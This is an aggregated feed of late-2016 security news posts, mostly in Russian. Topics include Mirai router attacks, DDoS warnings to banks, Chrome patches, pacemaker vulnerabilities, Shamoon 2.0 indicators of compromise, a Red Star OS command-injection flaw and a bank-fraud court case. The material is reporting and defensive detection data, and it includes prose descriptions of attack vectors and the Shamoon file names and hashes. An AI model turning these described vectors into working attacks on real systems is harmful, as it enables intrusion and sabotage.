    orig: 2016-12-05 05:37:33 / https://threatpost.ru/banki-poteryali-okolo-2-mlrd-rublej-iz-za-hakerov/19475/ (click post title)



    При МВД Германии может появиться спецподразделение хакеров

    В обязанности IT-специалистов будут входить ответные действия на случай  кибератак.

    В ближайшие 2-3 года в Министерстве внутренних дел Германии может быть создано специальное подразделение по борьбе с хакерскими атакам на объекты критической инфраструктуры страны.

    Как сообщает Deutsche Welle, подразделение будет сформировано из экспертов в области IT, а в его обязанности войдет оборона таких объектов, как АЭС или системы водоснабжения в случае кибератак. По словам представителя МВД Германии, специалисты займутся обезвреживанием технического арсенала противника и выведением из строя его серверов за границей. Такой план действий необходим на случай, если страна-источник атаки откажется от сотрудничества. Как пояснил представитель министерства, в правительстве ведутся дискуссии по поводу создания подобного спецподразделения, однако правоохранители все-таки рассчитывают на одобрение инициативы.

    Напомним, неделю назад порядка 900 тыс. клиентов немецкой телекоммуникационной компании Deutsche Telekom испытывали проблемы с доступом к интернету. Как оказалось, их маршрутизаторы были заражены новым образцом вредоносного ПО Mirai, разработанным специально для атак на устройства производства Zyxel.

    orig: 2016-12-05 05:32:10 / http://www.securitylab.ru/news/484639.php (click post title)



    Mirai наносит новый удар по провайдерам

    Теперь жертвами грозного IoT-ботнета Mirai стали сотни тысяч абонентов услуги широкополосного Интернета британских операторов TalkTalk и Post Office. За последние пару недель Mirai атаковал других крупных операторов в Европе — Deutsche Telekom, KCOM и Eir.

    Post Office начал испытывать проблемы в прошлое воскресенье, а TalkTalk — два дня назад. На резкое снижение скорости соединения пожаловались сотни тысяч пользователей. Такой же масштаб атаки наблюдал провайдер KCOM. Злоумышленники атаковали роутеры производства ZyXEL, используемые в сети.

    По словам KCOM и ZyXEL, уже готов патч для уязвимости, позволившей заразить устройства. ZyXEL уточнил, что атака производилась через порт 7547, открытый для технической поддержки по протоколу TR-064; в настоящее время производитель закрывает возможность удаленного доступа к порту. По его заявлению, решение проблемы сейчас является приоритетной задачей компании. Уязвимость, как рассказали в ZyXEL, возникла из-за изъяна в чипсетах Econet RT63365 и MT7505 и сопутствующих SDK версий #7.3.37.6 и #7.3.119.1 v002 соответственно.

    В Post Office заявили о том, что с проблемой столкнулись около 100 тыс. клиентов и точкой входа атаки также стали роутеры ZyXEL, патч для которых вскоре будет предоставлен абонентам. Ранее атаке подверглись 900 тыс. клиентов германского оператора Deutsche Telekom, часть из них также использовала роутеры ZyXEL. В TalkTalk мишенью злоумышленников стали роутеры D-Link; оператор заверил, что патч вскоре будет применен на всех устройствах.

    Все операторы, атакуемые Mirai, также готовятся внедрить дополнительные меры безопасности на сети.

    О том, кто стоит за этими масштабными атаками и каковы их мотивы, сведений нет. Злоумышленники используют IoT-зловред Mirai, который обычно сканирует сеть на предмет открытых telnet-портов, а затем атакует уязвимые устройства, используя 61 комбинацию логина и пароля для брутфорса устройства. Обычно роутеры защищены недостаточно надежно, так как многие из них используют заводские учетные записи для доступа к устройству.

    Потенциальные жертвы Mirai среди сетевых устройств — это более 5 млн роутеров с открытыми диагностическими портами. Это, а также наличие модуля Metasploit для автоматизации атак делает ботнет Mirai масштабной угрозой. Хотя червь Mirai живет в памяти роутера и его можно «убить» перезагрузкой, он способен полностью захватить доступ к диагностическому порту, что значительно затрудняет доставку патча операторов.

    Как всегда, проблему усугубляет исторически очень низкий уровень безопасности роутеров, и в ближайшее время это не изменится. Это фундаментальная проблема всей концепции Интернета вещей, согласны эксперты отрасли.

    orig: 2016-12-05 05:27:10 / https://threatpost.ru/mirai-nanosit-novyj-udar-po-provajderam/19471/ (click post title)



    Крымские банки отключили банкоматы из-за угрозы DDoS-атак

    О возможных хакерских атаках на российские банки несколько дней назад предупредила ФСБ.

    Крупные крымские банки предупредили о временном отключении сети банкоматов в ночь на понедельник, 5 декабря, в связи с угрозой DDoS-атаки. Об этом сообщают «РИА Новости» со ссылкой на банковские структуры полуострова.

    О возможных хакерских атаках на российские банки несколько дней назад предупредила Федеральная служба безопасности РФ. По сведениям ведомства, попытки атак могут начаться уже в понедельник, 5 декабря.

    В связи с возможными DDoS-атаками, решения о временном отключении своих сетей банкоматов на территории полуострова приняли «Генбанк» и банк «Россия». Согласно опубликованному 4 декабря сообщению на сайте «Генбанка», работа сети его банкоматов будет приостановлена с 21:00 воскресенья по 9:00 понедельника. Как отметили в «Генбанке», блокировка устройств осуществлена в целях предотвращения несанкционированных транзакций и утраты клиентами средств. В настоящее время работа банкоматов восстановлена.

    В Российском национальном коммерческом банке (РНКБ) информацию о временной приостановке работы банкоматов не подтвердили, но и не опровергли. Как заверили финорганизации, у клиентов не возникнет сложностей с использованием хранящихся в банках средств во время отключения банкоматов.

    orig: 2016-12-05 05:18:50 / http://www.securitylab.ru/news/484638.php (click post title)



    В Индии могут создать единое киберкомандование

    Инициатива является частью комплексной политики по противодействию кибершпионажу.

    Власти Индии намерены повторно рассмотреть план по формированию общего кибернетического командования, призванного обеспечить защиту от киберугроз совместными силами индийской армии, флота и ВВС, сообщает ресурс DNAIndia со ссылкой на источники в правительстве.

    В настоящее время каждая военная структура имеет собственные механизмы борьбы с киберугрозами и координировать их совместные действия довольно непросто, отмечает издание. Новое командование будет тесно сотрудничать с гражданскими спецслужбами. Инициатива является частью комплексной политики по противодействию кибершпионажу, отметил собеседник ресурса.

    Вопрос о создании единого киберкомандования обсуждался в правительстве Индии еще в 2010 году, однако реализация идеи была отложена. По словам источников, формирование подобной структуры потребует внесения изменений в законодательство. В частности, необходимо пересмотреть положения утвержденной в 2013 году Национальной политики в области кибербезопасности в соответствии с «изменяющейся динамикой киберугроз и военных действий в киберпространстве», считают собеседники издания.

    Тем не менее, чиновники, имеющие отношение к инициативам по кибербезопасности, настроены скептично.

    «Идея о формировании унифицированного кибернетического командования рассматривается на протяжении нескольких лет, однако какие-либо конкретные меры так и не были приняты. Мы можем только надеяться, что единое киберкомандование увидит свет без дальнейших задержек», - отметил один из собеседников ресурса.

    orig: 2016-12-05 04:45:28 / http://www.securitylab.ru/news/484637.php (click post title)



    Официальное сообщение Алексея Лукацкого по поводу возможной дестабилизации финансовой системы РФ

    Федеральная служба безопасности РФ выпустила сообщение о том, что получена информация о подготовке иностранными спецслужбами масштабных кибератак, целью которых является дестабилизация финансовой системы РФ, включая деятельность ряда крупнейших российских банков. Ожидается, что кибернападения будут сопровождаться массовыми рассылками SMS-сообщений и публикациями провокационного характера в социальных сетях (в отношении кризиса кредитно-финансовой системы России, банкротства и отзыва лицензий у ведущих банков).

    Я считаю, что данные в Интернете редкие рекомендации не имеют никакого отношения к действительности, так как исходят из привычной парадигмы "банк может быть атакован хакером, цель которого украсть деньги". В данном случае речь идет о совершенно иной мотивации у тех, кто стоит за планируемыми атаками, и хищения средств, скорее всего, не предвидится. Также малореализуемы и неконкретные рекомендации банкам по присоединению к ГосСОПКЕ, обращению в FinCERT, чтению отраслевых стандартов или реализации правил разработки безопасных приложений. Если вы этого не делали раньше, то сейчас уже поздно. Более того, когда федеральный орган исполнительной власти, уполномоченный в области национальной безопасности страны, публикует свою новость перед выходными и у целевой аудитории остается меньше суток на принятие каких-либо мер, то рекомендации должны быть очень конкретными и понятными.

    Читая очень неконкретное сообщение ФСБ я бы предположил, что речь может идти о трех типах атак:

    Мишенью для данной угрозы являются клиенты финансовых учреждений и сами кредитные организации. При этом, учитывая, что такую новость в обязательном порядке повторят, сопровождая не всегда удачными и верными комментариями (надо же быстро выпустить "горячую новость" раньше других - тут не до проверки и не до сбора качественных экспертных мнений) еще и СМИ, то я бы их тоже выделил в качестве целевой аудитории для выработки рекомендаций.

    И, наконец, рекомендации должны учитывать не только вектор угрозы, но и описывать мероприятия, которые должны быть сделаны ДО реализации атаки, ВО ВРЕМЯ и ПОСЛЕ. Все-таки российские банки сталкиваются с такой угрозой уже не первый раз и поэтому можно сформулировать и некоторые best practices, которые позволят эффективно бороться и тем, кто с этим сталкивался, и тем, кто с этим еще не сталкивался.

    В итоге получается вот такой вот "куб рекомендаций", где каждый из 27-ми блоков содержит свой совет по тому, как себя вести той или иной целевой аудитории в определенные моменты времени.

    Причем эти рекомендации будут совершенно разноплановыми и как повторять то, что уже написано в том же СТОБР или 382-П (но более простым языком), так и быть совсем новыми (для тех же СМИ или клиентов, которым ни ЦБ, ни тем более ФСБ не уделяют пока должного внимания). В последнем случае очень не хватает "Основ госполитики в области формирования культуры ИБ", которые готовились в Совете Безопасности несколько лет назад.

    Какие советы могут попасть в такой список? Не претендуя на полноту и охват, я бы включил следующие (советы СМИ давать не буду - все равно не следуют):


    А вот уже по не столь публичным каналам (FinCERT или ГосСОПКУ, работающую с банками через корпоративные центры) можно рассылать соответствующие IOCи с IP-адресами и номерами автономных систем той же BlazingFast для использования их в системах и сервисах защиты.

    А надо ли читать отраслевые стандарты, внедрять SDLC в процесс разработки, читать методические рекомендации и т.п.? Надо, только не во время атаки, когда заниматься самообразованием уже поздно. Тут уместно вспомнить заметки про цикл Бойда и несовершенство PDCA, которые я написал больше полугода назад. Цикл Бойда помогает во время атаки (что нам сейчас и надо), а PDCA - до нее, когда надо выстроить систему ИБ на предприятии. Стандарты, SDLC, методички, политики, выстраивание взаимодействия с SOCами... это все в области размеренного PDCA, а не петли Бойда.

    В заключение хочу повторить то, что я писал полгода назад о том, что регуляторам стоит поменять отношение к PR своей деятельности. И вот новый пример того, как не стоит сообщать всей стране о киберугрозах, заставляя всю страну в панике додумывать, что же имела ввиду ФСБ. В прошлый раз не очень удачный PR по свершившемуся кибер-преступлению, а в этот - по еще не начавшемуся. Кстати, на сайте МВД или ЦБ ни слова об этой угрозе. И если с МВД еще можно это как-то объяснить, то молчание сайта финансового регулятора выглядит странно :-(

    ЗЫ. Интересно, что не все поставщики услуг отражения DDOS позволяет легко подключиться к своему сервису и не используют ту возможность, которую им предоставила ФСБ со своей страшилкой. Например, тот же Qrator заявляет о подключении всего за 20 минут и описывает процедуру, а вот у ЛК на сайте только маркетинговое описание услуги и нет кнопки "Я под атакой! Помогите!". Читать во время атаки листовки будут не все :-)

    ЗЗЫ. А вот интересная реакция ЦБ на последние события с хищениями средств - массовые проверки и обязательная сертификация ДБО по требованиям безопасности.

    orig: 2016-12-05 01:28:00 / http://lukatsky.blogspot.com/2016/12/blog-post_5.html (click post title)



    Google закрыла 12 опасных брешей в Chrome

    Google призывает пользователей Windows, Mac и Linux обновить свои браузеры Chrome, чтобы избавиться от множественных уязвимостей, позволяющих захватить контроль над системой.

    Новые патчи включены в выпуск Chrome 55.0.2883.75, появившийся в четверг. В браузере также произведен ряд функциональных изменений, в частности усовершенствована обработка событий жестов при выполнении панорамирования, а для CSS введена поддержка форматирования текста с автоматической расстановкой переносов.

    Американская группа быстрого реагирования на киберинциденты (US-CERT) опубликовала анонс обновленного Chrome. Google со своей стороны отчиталась о выплатах, произведенных в рамках Bug Bounty за обнаружение 26 ныне закрываемых уязвимостей. Общая сумма вознаграждений сторонним исследователям составила $70 тыс. Остальные 10 брешей были найдены в ходе внутреннего аудита.

    Список багов, устраненных в Chrome с подачи сторонних исследователей, возглавляет дюжина уязвимостей высокой степени опасности. Пять из них представляют собой Universal XSS (UXSS) в Blink — движке браузера, разработанном в рамках Chromium Project. Три из этих UXSS принесли ИБ-исследователю Мариушу Млыньскому (Mariusz Mlynski) $22,5 тыс. В мае за аналогичные баги поляк получил премию в $15 тыс.

    Четыре бреши высокой степени опасности присутствовали в PDFium, дефолтном PDF-ридере Chrome, еще две крылись в JavaScript-движке V8.

    Девять уязвимостей, найденных сторонними исследователями, оценены как умеренно опасные. Две из них связаны с работой Omnibox, адресной строки, содержимое которой  хакерам ранее удавалось подменить.

    Ниже приведен список уязвимостей высокой и умеренной опасности, удостоенных выплат в рамках Bug Bounty Google:

    orig: 2016-12-04 21:05:37 / https://threatpost.ru/google-fixes-12-high-severity-flaws-in-chrome-browser/19465/ (click post title)



    Порядок передачи кредитных историй на хранение в Центральный каталог кредитных историй


    Указанием Банка России от 10.10.2016 № 4150-У установлен «Порядок передачи кредитных историй на хранение в Центральный каталог кредитных историй».

    Для справки: Федеральный закон «О кредитных историях» предусматривает передачу кредитных историй на хранение в Центральный каталог кредитных историй (ЦККИ) в следующих случаях:

    Передача кредитных историй осуществляется (п.1):
    Передача осуществляется (п.2):
    Распорядительным актом Банка России создается комиссия для приема кредитных историй в ЦККИ. В случае их приема по месту нахождения ЦККИ председателем комиссии является ее руководитель.

    Кредитные истории передаются в ЦККИ в электронном виде на внешних неперезаписываемых машинных носителях (без использования средств криптографической защиты информации) в формате, определенном в соответствии с Указанием Банка России от 15 марта 2015 года № 3599-У «О формате и порядке предоставления Банку России по его запросу кредитных отчетов субъектов кредитных историй из бюро кредитных историй».

    Машинные носители передаются в ЦККИ в закрытой упаковке, опечатанной печатью БКИ (печатью конкурсного управляющего) с указанием даты опечатывания, инициалов, фамилии, должности лица, передающего кредитные истории, и проставлением его подписи (упаковка с кредитными историями).

    В упаковке с кредитными историями представляется перечень сведений, который содержит:
    Информация, содержащаяся в перечне сведений, группируется в алфавитном порядке:В данном перечне указывается порядковый номер машинного носителя, на котором содержатся соответствующие кредитные истории.

    Перечень сведений представляется в двух экземплярах в электронном виде на машинных носителях без использования средств криптографической защиты информации.

    Сообщение о предстоящей передаче направляется по электронной почте и по факсу, указанным на официальном сайте Банка России:
    Прием кредитных историй осуществляется комиссией в присутствии всех членов комиссии и лица, их передающего(п.8).

    При приеме комиссия проверяет у лица, передающего кредитные истории, наличие соответствующих полномочий. Комиссией проверяется (п.9):
    Составляется акт приема-передачи кредитных историй на хранение в ЦККИ.

    Кредитные истории и соответствующие документы комиссией не принимаются в случае (п.9.2)
    Передача кредитных историй на хранение оформляется актом приема-передачи на бумажном носителе в двух экземплярах, один из которых передается комиссии, другой - лицу, их  передающему (п.10).

    После подписания акта машинные носители, содержащие кредитные истории, упаковываются и опечатываются печатью ЦККИ (печатью ТУ Банка России) с указанием (п.11):
    В случае приема в ТУ Банка России кредитные истории и документы (оригиналы) направляются в ЦККИ в течение трех рабочих дней посредством заказного почтового отправления с уведомлением о вручении. Копия акта приема-передачи остается на хранении в ТУ Банка России. В случае, если прием в ТУ Банка России не состоялся, информация об этом доводится до сведения ЦККИ.

    После получения ЦККИ кредитных историй, информация об этом размещается на официальном сайте Банка России в разделе «Кредитные истории» с указанием номера из реестра и полного наименования БКИ, чьи документы переданы на хранение, а также даты их передачи (п.12).

    Для справки: Со дня вступления в силу Указания не будет применяться приказ Федеральной службы по финансовым рынкам от 23 ноября 2006 года № 06-133/пз-н «Об утверждении Порядка передачи кредитных историй на хранение в Центральный каталог кредитных историй».

    Источник: Консультант Плюс
    http://www.consultant.ru/cons/cgi/online.cgi?req=doc;base=LAW;n=207107#0

    orig: 2016-12-04 21:05:02 / http://rusrim.blogspot.com/2016/12/blog-post_5.html (click post title)



    Эксперты обнаружили уязвимости в кардиостимуляторах

    Интересный доклад озаглавленный «О (не) безопасности современных вживляемых кардиодефибрилляторов и о том, как сделать их безопасными» был представлен сводной группой исследователей из Левенского католического университета, Бирмингемского университета, а также университетской больницы Gasthuisberg.

    Команда изучила работу 10 различных кардиостимуляторов и кардиодефибрилляторов, с целью выяснить, можно ли скомпрометировать такие устройства удаленно и причинить вред их носителю. Как выяснилось, можно.

    Исследователи проводили тестирование по методу черного ящика (black box testing), то есть перед началом тестов им не было известно ничего о внутреннем устройстве девайсов и их предварительное изучение не проводилось. Для своих экспериментов специалисты вооружились коммерческим оборудованием, которое вряд ли можно назвать недорогим, однако приобрести его можно свободно:  Universal Serial Radio Peripheral URSP-2920 ($3670), USB-6353 ($2886).

    «Мы умышленно работали по методике black-box, имитируя поведение самых непродвинутых атакующих, у которых нет никаких исходных знаний о спецификации системы. Используя метод black-box, мы просто прослушивали беспроводной канал, а затем производили реверс-инжиниринг проприетарного протокола связи. Как только все нули и единицы, а также их значения, становились нам известны, мы могли выдать себя за настоящий ридер и произвести атаки», — рассказывают специалисты.

    В докладе исследователи рассказывают, что им удалось существенно увеличить скорость разрядки батареи устройств, похитить личные данные пациентов, которые хранятся кардиостимуляторами, а также передать современным вживляемым кардиодефибрилляторам произвольные команды.

    Последнее обстоятельство является самым опасным. Технически вживляемые кардиодефибрилляторы (Implantable Cardiac Defibrillators, ICD) – это более продвинутая версия привычным кардиостимуляторов. Равно как и обычное устройство, они могут посылать электрические сигналы сердцу пациента, чтобы регулировать его активность. Однако в случае возникновения экстренной ситуации, у вживляемых дефибрилляторов также есть возможность передавать более сильные электрические сигналы, подобно тому, как это делают дефибрилляторы в больницах. Исследователи пишут, что атакующий может передать ICD команду на создание сильного электрического импульса, и последствия такой атаки, скорее всего, будут смертельными, пишет xakep.ru.

    Физический доступ к устройству для подобной атаки не требуется. Злоумышленнику достаточно находится на расстоянии примерно пяти метров от жертвы. Исследователи говорят, что атакующему даже не обязательно приближаться к пациенту лично: можно заранее установить маячки в стратегических местах, где тот часто бывает (к примеру, в больнице или на остановке общественного транспорта).

    Разумеется, в докладе не перечислены модели протестированных устройств и названия компаний-производителей. Из соображений безопасности исследователи не раскрывают слишком много данных о своих изысканиях. Журналистам The Register исследователи без подробностей сообщили, что уязвимый вендор был проинформирован о проблемах, и уже выпустил патч.

    orig: 2016-12-04 20:27:22 / https://www.anti-malware.ru/news/2016-12-04/21610 (click post title)



    FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region

    In 2012, a suspected Iranian hacker group called the “Cutting Sword of Justice” used malware known as Shamoon – or Disttrack. In mid-November, Mandiant, a FireEye company, responded to the first Shamoon 2.0 incident against an organization located in the Gulf states. Since then, Mandiant has responded to multiple incidents at other organizations in the region.

    Shamoon 2.0 is a reworked and updated version of the malware we saw in the 2012 incident. Analysis shows the malware contains embedded credentials, which suggests the attackers may have previously conducted targeted intrusions to harvest the necessary credentials before launching a subsequent attack.

    FireEye HX and FireEye NX both detect Shamoon 2.0, and our Multi-Vector Virtual Execution (MVX) engine is also able to proactively detect this malware.

    The following is a summary of what we know about Shamoon 2.0 based on the samples we’ve analyzed:

    The following is guidance for detecting the malware, counteracting its activity, and attempting to prevent it from propagating in an environment. Please note that performing any of these actions could have a negative effect and should not be implemented without proper review and study of the impact of the environment.

    Indicators of Compromise

    The following is a set of the Indicators of Compromise for the identified Shamoon variant. We recommend that critical infrastructure organizations and government agencies (especially those in the Gulf Cooperation Council region) check immediately for the presence or execution of these files within their Windows Server and Workstation environments. Additionally, we recommend that all customers continue to regularly review and test disaster recovery plans for critical systems within their environment.

    File name: ntssrvr64.exe
    Path: %SYSTEMROOT%\System32
    Compile Time: 2009/02/15 12:32:19
    File size:717,312

    File name: ntssrvr32.exe
    Path: %SYSTEMROOT%\System32 NA NA
    File size: 1,349,632

    File name: ntssrvr32.bat
    Path: %SYSTEMROOT%\System32 NA
    MD5: 10de241bb7028788a8f278e27a4e335f
    File size: 160

    File name: gpget.exe
    Path: %SYSTEMROOT%\System32
    PE compile time: 2009/02/15 12:30:41
    MD5: c843046e54b755ec63ccb09d0a689674
    File Size: 327,680

    File name: drdisk.sys
    Path: %SYSTEMROOT%\System32\Drivers
    Compile time: 2011/12/28 16:51:29
    MD5: 76c643ab29d497317085e5db8c799960
    File Size: 31,632

    File name: key8854321.pub
    Path: %SYSTEMROOT%\System32
    MD5: b5d2a4d8ba015f3e89ade820c5840639 782

    File name: netinit.exe
    Path: %SYSTEMROOT%\System32
    MD5: ac4d91e919a3ef210a59acab0dbb9ab5
    File Size: 183,808
    Service Details
    Display name: "Microsoft Network Realtime Inspection Service"
    Service name: "NtsSrv"

    Description: "Helps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols"
    Files created:

    Dynamic Analysis Observables

    RegistryItem HKLM\SYSTEM\CurrentControlSet\Services\NtsSrv\

    RegistryItem HKLM\SYSTEM\ControlSet001\Services\NtsSrv\

    RegistryItem HKLM\SYSTEM\CurrentControlSet\Services\wow32\

    RegistryItem HKLM\SYSTEM\ControlSet001\Services\wow32\

    RegistryItem HKLM\SYSTEM\CurrentControlSet\Services\drdisk\

    RegistryItem HKLM\SYSTEM\ControlSet001\Services\drdisk\

    FileItem C:\Windows\System32\caclsrv.exe

    FileItem C:\Windows\System32\certutl.exe

    FileItem C:\Windows\System32\clean.exe

    FileItem C:\Windows\System32\ctrl.exe

    FileItem C:\Windows\System32\dfrag.exe

    FileItem C:\Windows\System32\dnslookup.exe

    FileItem C:\Windows\System32\dvdquery.exe

    FileItem C:\Windows\System32\event.exe

    FileItem C:\Windows\System32\extract.exe

    FileItem C:\Windows\System32\findfile.exe

    FileItem C:\Windows\System32\fsutl.exe

    FileItem C:\Windows\System32\gpget.exe

    FileItem C:\Windows\System32\iissrv.exe

    FileItem C:\Windows\System32\ipsecure.exe

    FileItem C:\Windows\System32\msinit.exe

    FileItem C:\Windows\System32\netx.exe

    FileItem C:\Windows\System32\ntdsutl.exe

    FileItem C:\Windows\System32\ntfrsutil.exe

    FileItem C:\Windows\System32\ntnw.exe

    FileItem C:\Windows\System32\power.exe

    FileItem C:\Windows\System32\rdsadmin.exe

    FileItem C:\Windows\System32\regsys.exe

    FileItem C:\Windows\System32\routeman.exe

    FileItem C:\Windows\System32\rrasrv.exe

    FileItem C:\Windows\System32\sacses.exe

    FileItem C:\Windows\System32\sfmsc.exe

    FileItem C:\Windows\System32\sigver.exe

    FileItem C:\Windows\System32\smbinit.exe

    FileItem C:\Windows\System32\wcscript.exe

    orig: 2016-12-04 17:47:15 / http://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html (click post title)



    Уязвимость в северокорейской ОС позволяет удаленное внедрение команд

    Эксперты тестировали свой эксплоит на RedStar 3.0 с версией браузера Naenara 3.5.

    Red Star представляет собой операционную систему на базе ядра Linux, разработанную и используемую в КНДР. Несколько версий северокорейской ОС для настольных ПК и серверов ранее уже попадали в поле зрение команды исследователей Hacker House. Эксперты обнаружили ряд уязвимостей, позволяющих получить на системе права суперпользователя, и в годовщину утечки Red Star раскрыли подробности об уязвимости, с помощью которой можно удаленно внедрить произвольные команды.

    Проблема существует на стороне клиента и может быть вызвана из интернета/интранета. Злоумышленник может проэксплуатировать уязвимость, заставив жертву нажать на вредоносную ссылку и тем самым установив на ее компьютере вредоносное ПО. Несколько векторов атак связаны со встроенным в Red Star браузером Naenara.

    Эксперты тестировали свой эксплоит на RedStar 3.0 с версией браузера Naenara 3.5. Как обнаружилось во время исследования браузера на наличие уязвимостей, обработка URL осуществлялась утилитой командной строки “/usr/bin/nnrurlshow”. Приложение принимает аргументы URI для зарегистрированных обработчиков URI при обработке таких запросов, как “mailto” и “cal”.

    При обработке данных запросов Naenara не проверяет командную строку, поэтому атакующий может выполнить код, лишь отправив nnrurlshow особым образом сконфигурированную ссылку. Злоумышленник способен заставить пользователя выполнить произвольные команды, убедив нажать на ссылку, ведущую на mailto: `cmd`. Команды будут выполнены как аргументы. Ниже представлен пример эксплуатации уязвимости.

    2.png

    orig: 2016-12-04 08:01:50 / http://www.securitylab.ru/news/484636.php (click post title)



    Видео: Касси Финдлей о доверии, опирающемся на децентрализованные вычисления, и о новых моделях управления документами



    Австралийский электронный архивист и специалист по управлению документами Касси Финдлей (Cassie Findlay), с моей точки зрения, один из наиболее интересных идеологов среди представителей нашей профессии, и на моём блоге уже не раз выкладывались переводы её статей. Касси много размышляет над тем, как можно преобразовать архивное дело и управление документами в современных условиях, с привлечением разнообразных информационных технологий.

    Вниманию тех, кто знает английский язык, предлагается выложенная 13 ноября 2016 года на сайтеYouTube 22-минутная запись выступления Касси Финдлей на ежегодной конференции Австралийского общества архивистов (Australian Society of Archivists, ASA), которая проходила 17-21 октября 2016 года. Это выступление под название «распределенное доверие через вычисления, и новые модели управления документами» (Decentralised trust through computation and new models for recordkeeping) было сделано на секции 11 «Вездесущий архив» (The Ubiquitous Archive) 20 октября 2016 года.

    Среди прочего, в выступлении обсуждается очень модная сейчас технология распределенных реестров («блокчейн») и возможные способы её применения на практике.



    Хотя в целом Касси Финдлей говорит о блокчейне, я бы сказала, в достаточно «романтическом» ключе, она также отмечает и ряд проблем с внедрением данной технологии. В первую очередь проблему интеграции с существующей правовой системой.

    Дополнительную информацию о конференции, основная тема которой была «Укрепление связей между людьми, системами и архивами», можно найти на её сайте по адресу: https://www.archivists.org.au/learning-publications/2016-conference . В программу включены ссылки на другие видеозаписи докладов.

    Источник: YouTube
    https://www.youtube.com/watch?v=11lcEkxdzKg
    https://youtu.be/11lcEkxdzKg

    orig: 2016-12-04 08:00:27 / http://rusrim.blogspot.com/2016/12/blog-post_4.html (click post title)



    Yes WeChat. Небольшая цензура в одном большом мессенджере

    Непопулярные меры, если уж делать и получать минусы в карму - должны быть реализованы эффективно а не как опять с этим вашим линкедином. Вот, например, небольшой анализ возможностей по фильтрации
     сообщений чатов WeChat в Китае. Если коротко:

    Интересно, кстати, справляются ли они с передачей картинок и текстом на них.

    Понятно что это всё легко обходится простой словарной заменой. Но для вовлечения новых людей и раздутия недовольства определенная преграда есть.

    Все соц.сеточки в Поднебесной, кстати, тоже по росту построены и добросовестно фильтруют базар. Без всякой сырости и демократий. ЕВПОЧЯ.

    orig: 2016-12-04 06:13:43 / http://kchln.blogspot.com/2016/12/yes-wechat.html (click post title)



    Арбитражная практика: Договором не предусмотрена обязанность банка исполнять платежи только после их подтверждения


    К сожалению, риски несанкционированного списания денежных средств со счетов организаций при дистанционном банковском обслуживании остаются высокими. Подавляющее большинство исков к банкам в подобных ситуациях организации проигрывают, но бывают и исключения.

    Арбитражный суд Республики Карелия в мае 2015 года рассмотрел дело № А26-386/2015, в котором, несмотря на то, что электронная подпись была корректной, суд первой инстанции счел, что существовали обстоятельства, позволяющие усомниться в законности платежа, которые банк проигнорировал. Однако Арбитражный суд Северо-Западного округа с этим не согласился.

    Суть спора

    В сентябре 2014 года со счета общества ЗАО «Карлис-Пром» на основе электронных платежных поручений, подписанных электронными подписями, было произведено списание денежных средств:

    При поступлении денежных средств в банк «Авангард», последний обратился в ОАО Банк «Онего» с просьбой подтвердить платеж. Сотрудник банка по телефону связался с обществом за подтверждением денежного перевода на счёт предпринимателя. Общество платеж не подтвердило и сразу обратилось к банку с заявлением о его возврате и предоставило информацию о всех платежных поручениях, созданных обществом и направленных банку 22 сентября 2014 года в системе «Банк-Клиент».

    В этот день общество выполняло платежи, в том числе, по платежным поручениям №1281 и 1282, но на другие суммы и другим получателям. При этом о втором платеже на сумму 982 тысячи руб. банк сообщил обществу по телефону только около 17.30. Общество платеж не подтвердило.

    В банк от имени общества поступили два платежных поручения под №1281:
    Платежных поручения №1282 в банк поступило также два экземпляра:
    Согласно письму Отделения МВД России по Сортавальскому району, все платежные поручения в адрес банка были отправлены с одного и того же электронного адреса.

    Ранее с индивидуальным предпринимателем и ООО «Глория» общество не сотрудничало. После неподтверждения платежа денежные средства в сумме 2,4 млн. руб. были возвращены на счёт общества, а вот денежные средства в сумме более 982 тысяч руб., перечисленные по платежному поручению №1282 в ОАО «Альфа-Банк» на расчётный счет ООО «Глория», были обналичены неустановленным лицом.

    Поскольку ОАО Банк «Онего» отказалось удовлетворить претензию общества о восстановлении на его счете несанкционированно списанных денежных средств, общество обратилось в суд с иском.

    Позиция Арбитражного суда Республики Карелия

    Суд отметил, что 22 сентября 2014 года в течение короткого промежутка времени (в пределах одного часа) от имени общества в банк поступили платежные поручения с одинаковыми номерами. Суд отклонил довод банка об отсутствии нормативно установленного запрета на проставление одинаковой нумерации на платёжных поручениях. Такая практика не соответствует обычаям делового оборота, о чем банк, являющийся профессиональным участником рынка финансовых услуг, не мог не знать, и при проявлении должной осмотрительности, действуя разумно, обязан был принять меры для дополнительной проверки распоряжения клиента.

    Более того, как минимум дважды (последний раз в июне 2014) общество, пытаясь обезопасить себя от несанкционированного списания денежных средств, направляло в банк письма с просьбой о проведении платежей, превышающих 200 тысяч руб. с расчётного счёта общества, после дополнительного подтверждения клиента о наличии соответствующего распоряжения, за исключением поименованных в письмах контрагентов общества, при перечислении которым сумм, превышающих 200 тыс. руб.,  дополнительного подтверждения не требовалось.

    При этом общество ссылалось на то,  что до увольнения сотрудницы банка, которая его обслуживала, она регулярно созванивалась с обществом в целях подтверждения платежей. Суд оценил такое поведение как разумное, отметив, что за подтверждением платежей в пользу предпринимателя и ООО «Глория» банк обратился к обществу только после списания средств со счета.

    Возражения банка относительно отсутствия у него права контролировать использование денежных средств клиента судом не были приняты.  Суд отметил, что в данном случае сам клиент наделил банк полномочиями по дополнительному контролю в целях удостоверения прав клиента.

    Суд отметил, что в ситуации, когда электронная подпись формально была введена корректно, но существовали обстоятельства, позволяющие усомниться в законности платежа, банк проигнорировал данные обстоятельства, то есть не проявил должную осмотрительность и внимательность. В свою очередь, клиент сделал все возможное, чтобы обезопасить свой счет от несанкционированного списания.

    Арбитражный суд удовлетворил иск общества и взыскал с ОАО Банк «Онего» более 982 тысяч руб. убытков.

    Тринадцатый арбитражный апелляционный суд в августе 2015 года оставил без изменения решение суда первой инстанции, а апелляционную жалобу - без удовлетворения.

    Позиция Арбитражного суда Северо-Западного округа

    Арбитражный суд Северо-Западного округа в декабре 2015 года отметил, что банк несет ответственность за исполнение поручения, выданного неуполномоченным лицом, в том случае, если с использованием предусмотренных банковскими правилами и договором процедур он мог установить факт выдачи распоряжения неуполномоченными лицами.

    Платежное поручение № 1282, поступившее в банк в электронном виде, было подписано электронной подписью общества и было направлено с его электронного адреса. Суд отметил, что у банка не было оснований не исполнять спорное платежное поручение, и он не может быть привлечен к ответственности за его исполнение.

